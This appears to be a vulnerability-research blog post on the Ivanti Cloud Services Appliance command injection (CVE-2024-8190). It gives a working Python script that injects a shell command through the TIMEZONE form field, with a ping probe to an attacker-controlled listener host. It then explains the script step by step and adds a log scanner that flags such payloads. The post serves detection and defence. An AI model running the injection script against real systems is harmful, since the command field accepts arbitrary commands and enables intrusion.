Detecting Ivanti Authenticated Command Injection (CVE-2024-8190)

vsociety
Sep 19, 2024


by @secatgourity

#!/usr/bin/python3
import argparse
import re
import requests
import sys
import urllib3
from requests.auth import HTTPBasicAuth

# The appliance usually presents a self-signed certificate; verify=False below
# would otherwise print a warning on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(url, username, password, command):
    u = username
    p = password
    s = requests.Session()
    # Fetch the date/time form with HTTP basic auth to obtain the CSRF token.
    r = s.get(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u, p), verify=False)
    m = re.search(r"name=['\"]LDCSA_CSRF['\"]\s+value=['\"]([^'\"]+)['\"]", r.text)
    if m:
        ldcsa = m.group(1)
        print(f"[+] Got LDCSA_CSRF value: {ldcsa}")
    else:
        print("[-] Failed getting LDCSA_CSRF token")
        sys.exit(0)
    # The probe command rides in the TIMEZONE field; the remaining fields are
    # ordinary values the form expects.
    payload = {
        "dateTimeFormSubmitted": "1",
        "TIMEZONE": f"; `{command}` ;",
        "CYEAR": "2024",
        "CMONTH": "9",
        "CDAY": "13",
        "CHOUR": "12",
        "CMIN": "34",
        "LDCSA_CSRF": ldcsa,
        "SUBMIT_TIME": "Save",
    }
    print("[*] Sending payload...")
    r = s.post(f"{url}/gsb/datetime.php", auth=HTTPBasicAuth(u, p), verify=False, data=payload)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='The base URL of the target', required=True)
    parser.add_argument('--username', help='The application username', required=True)
    parser.add_argument('--password', help='The application password', required=True)
    parser.add_argument('--attacker-host', help='Burp Collaborator / RequestBin / Interactsh / ... hostname', required=True)
    args = parser.parse_args()
    # The probe is an outbound ping: a vulnerable appliance sends it to the listener host.
    exploit(args.url, args.username, args.password, f"ping -c3 {args.attacker_host}")

Description

Introduction

An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8190

Detection Script Usage

kali@kali:/tmp$ python3 detection.py -h
usage: detection.py [-h] -u URL --username USERNAME --password PASSWORD --attacker-host ATTACKER_HOST

options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the target
--username USERNAME The application username
--password PASSWORD The application password
--attacker-host ATTACKER_HOST
Burp Collaborator / RequestBin / Interactsh / ... hostname

kali@kali:/tmp$

Detecting Vulnerable Targets

python3 detection.py -u http://ivanti.local --username admin --password password --attacker-host dm6v2rdhgtwsz.x.pipedream.net

Understanding detection script

The detection script works as follows:

  1. It accepts user arguments: the target URL, credentials for the application, and the attacker-controlled host that should receive the ping probes if the target is vulnerable.
  2. Next, the script authenticates to the application with HTTP basic auth, fetches /gsb/datetime.php and extracts the LDCSA_CSRF token from the response.
  3. If that is successful, a POST request is submitted to /gsb/datetime.php with the payload in the TIMEZONE parameter.
  4. The injected command is ping -c3 ATTACKER_HOST, placed in the TIMEZONE parameter as follows: "TIMEZONE": f"; `{command}` ;".
  5. If the target is vulnerable, the attacker-controlled host receives 3 ping probes, confirming the vulnerability.
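From the defender's side, the same probe shape can be spotted in request logs. The following Python is an added illustration for this write-up (not vsociety's script and not Ivanti code): it flags POST submissions to /gsb/datetime.php whose TIMEZONE field is not a plain tz database name or carries shell metacharacters such as ';' and backticks. The record layout, the helper names and the sample entries (including the CSRF token value) are constructed assumptions; feed it whatever body-level request log (WAF, reverse proxy, audit trail) sits in front of the appliance.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Characters that let a value break out of a shell-interpolated argument
# (the probe described above uses ';' and backticks).
SHELL_META = re.compile(r"[;`|&$(){}<>\n]")

# A benign TIMEZONE is a tz database name such as Europe/Berlin or UTC.
TZ_NAME = re.compile(r"^[A-Za-z0-9_+\-/]{1,64}$")


def suspicious_timezone(value: str) -> bool:
    """True when the value contains shell metacharacters or is not a plain tz name."""
    return bool(SHELL_META.search(value)) or not TZ_NAME.match(value)


def inspect_record(record: dict) -> Optional[dict]:
    """Return a finding for one request record, or None when it looks benign.

    Record layout is an assumption for this example:
    {"src": client IP, "user": authenticated user, "method": ..., "path": ..., "body": urlencoded form}
    """
    if record["method"] != "POST" or not record["path"].startswith("/gsb/datetime.php"):
        return None
    fields = parse_qs(record["body"], keep_blank_values=True)
    tz = fields.get("TIMEZONE", [""])[0]
    if not suspicious_timezone(tz):
        return None
    return {"src": record["src"], "user": record["user"], "timezone": tz}


def scan(records) -> list:
    """Run inspect_record over every record and keep only the findings."""
    return [f for f in (inspect_record(r) for r in records) if f]


# Constructed sample records, not real appliance traffic.
SAMPLE_RECORDS = [
    # Legitimate timezone change by an admin.
    {"src": "10.0.0.5", "user": "admin", "method": "POST", "path": "/gsb/datetime.php",
     "body": "dateTimeFormSubmitted=1&TIMEZONE=Europe%2FBerlin&CYEAR=2024&CMONTH=9"
             "&CDAY=13&CHOUR=12&CMIN=34&LDCSA_CSRF=deadbeef&SUBMIT_TIME=Save"},
    # Same form, but TIMEZONE is shaped like the ping probe described above.
    {"src": "10.0.0.9", "user": "admin", "method": "POST", "path": "/gsb/datetime.php",
     "body": "dateTimeFormSubmitted=1&TIMEZONE=%3B+%60ping+-c3+oob.example%60+%3B"
             "&CYEAR=2024&CMONTH=9&CDAY=13&CHOUR=12&CMIN=34&LDCSA_CSRF=deadbeef&SUBMIT_TIME=Save"},
    # Token fetch (GET) that precedes a submission; nothing to inspect.
    {"src": "10.0.0.9", "user": "admin", "method": "GET", "path": "/gsb/datetime.php", "body": ""},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(f"[!] possible command injection from {finding['src']} as {finding['user']}: {finding['timezone']!r}")
```

Plain access logs record only the request line, so this check needs a log source that captures form bodies; the complementary signal, which the probe above relies on, is the appliance itself making outbound ICMP or DNS requests to hosts it has no business contacting.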

Written by vsociety

vsociety is a community centered around vulnerability research

No responses yet